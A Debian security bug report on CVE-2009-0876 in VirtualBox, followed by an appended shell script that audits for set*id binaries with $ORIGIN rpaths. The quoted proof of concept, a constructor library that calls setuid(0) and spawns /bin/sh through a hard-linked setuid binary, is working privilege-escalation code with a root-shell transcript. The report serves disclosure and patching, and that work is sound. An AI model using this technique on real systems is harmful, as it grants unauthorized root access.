Package: virtualbox-ose
Version: 2.1.4-dfsg-1
Severity: critical
Tags: security patch
Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for virtualbox-ose.

CVE-2009-0876[0]:
| Unspecified vulnerability in Sun xVM VirtualBox 2.0.0, 2.0.2, 2.0.4,
| 2.0.6r39760, 2.1.0, 2.1.2, and 2.1.4r42893 on Linux allows local users
| to gain privileges via unknown vectors related to "certain packages."

Quoting SpanKY <vap...@gentoo.org>:
"hardlinks on Linux preserve permission, including set*id bits, and can be
created by non-root users. virtualbox attempts to perform some sanity checks
on the dir the binary exists in (presumably to prevent privilege escalation),
however that is done after the constructors in shared libs are run. that
means any library a virtualbox binary links against is an attack vector.

the constructor isn't the only attack vector ... you could also override any
of the standard C library functions that virtualbox would call during its
startup. like open() or stat() or ...

there really aren't many workarounds available here if DT_RPATH:$ORIGIN
continues to be used. perhaps making a small dedicated partition (loopback
or whatever) and storing the binaries on there because hardlinks cannot go
across partitions.

simple example:
$ id -u
1002
$ cat test.c
#include <unistd.h>
#include <sys/syscall.h>

/* runs when the loader maps this library, i.e. before main() and before
 * any of VirtualBox's own directory sanity checks */
__attribute__((constructor)) void awesome(void)
{
	char *argv[] = { "sh", NULL };
	extern char *environ;
	syscall(SYS_setuid, 0);                        /* euid is already 0 from the setuid bit; make it the real uid too */
	syscall(SYS_execve, "/bin/sh", argv, environ); /* replace the process with a root shell */
}
$ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2
$ ls -l /opt/VirtualBox/VirtualBox
-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox
$ ln /opt/VirtualBox/VirtualBox
$ ls -l VirtualBox
-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox
$ ./VirtualBox
./VirtualBox: /home/vapier/libdl.so.2: no version information available (required by ./VirtualBox)
sh-4.0# whoami
root"

Upstream patches are available on:
http://www.virtualbox.org/changeset/17171
http://www.virtualbox.org/changeset/17169
http://www.virtualbox.org/changeset/17168

Debian lenny is not affected by this problem as the binaries are not setuid 0.

If you fix the vulnerability please also make sure to include the
CVE id in your changelog entry.

For further information see:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0876
    http://security-tracker.debian.net/tracker/CVE-2009-0876

-- 
Nico Golde - http://www.ngolde.de - n...@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
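The attack in the report needs two properties on the same binary: a set*id bit (so the kernel runs it with elevated privileges even through a hard link the attacker made) and a DT_RPATH/DT_RUNPATH containing $ORIGIN (so the dynamic loader looks for libraries next to whatever path the binary was invoked from). The helper below, added here as an audit aid and not part of the bug report or of VirtualBox's own tooling, checks exactly that combination. It assumes binutils' readelf is available; the function names (rpath_has_origin, is_setid, check_binary, scan_setid_origin) and the two sample readelf lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: find set*id ELF binaries whose rpath uses $ORIGIN.
# Assumes `readelf` from binutils; function names are my own.

# rpath_has_origin: read `readelf -d` output on stdin and succeed (exit 0)
# if a RPATH or RUNPATH entry refers to $ORIGIN or ${ORIGIN}.
rpath_has_origin() {
    grep -E '\((RPATH|RUNPATH)\)' | grep -q -e '\$ORIGIN' -e '\${ORIGIN}'
}

# is_setid: succeed if the file carries the setuid or setgid bit.
is_setid() {
    [ -u "$1" ] || [ -g "$1" ]
}

# check_binary: 0 = risky (set*id AND $ORIGIN in rpath), 1 = fine,
# 2 = not a readable ELF (readelf failed).
check_binary() {
    is_setid "$1" || return 1
    out=$(readelf -d "$1" 2>/dev/null) || return 2
    printf '%s\n' "$out" | rpath_has_origin
}

# scan_setid_origin: walk one filesystem (-xdev, since a hard link cannot
# cross filesystems anyway) and print every set*id file that check_binary
# flags as risky.
scan_setid_origin() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        check_binary "$f" && printf '%s\n' "$f"
    done
}

# Constructed samples of what `readelf -d` prints for the two cases
# (not captured from VirtualBox); used only to exercise the parser.
SAMPLE_RISKY=' 0x000000000000000f (RPATH)              Library rpath: [$ORIGIN]'
SAMPLE_SAFE=' 0x000000000000000f (RPATH)              Library rpath: [/usr/lib/virtualbox]'

if [ "${1:-}" = "--scan" ]; then
    scan_setid_origin "${2:-/}"
else
    printf '%s\n' "$SAMPLE_RISKY" | rpath_has_origin && echo "sample 1: \$ORIGIN in rpath (risky if set*id)"
    printf '%s\n' "$SAMPLE_SAFE"  | rpath_has_origin || echo "sample 2: absolute rpath (fine)"
fi
```

Run it as `sh audit.sh --scan /opt` to list hits under one tree. This is a static check of the binary only: whether the dynamic loader actually expands $ORIGIN for a program running with elevated privileges depends on the C library version, so treat a hit as something to verify on the target system rather than as proof of exploitability.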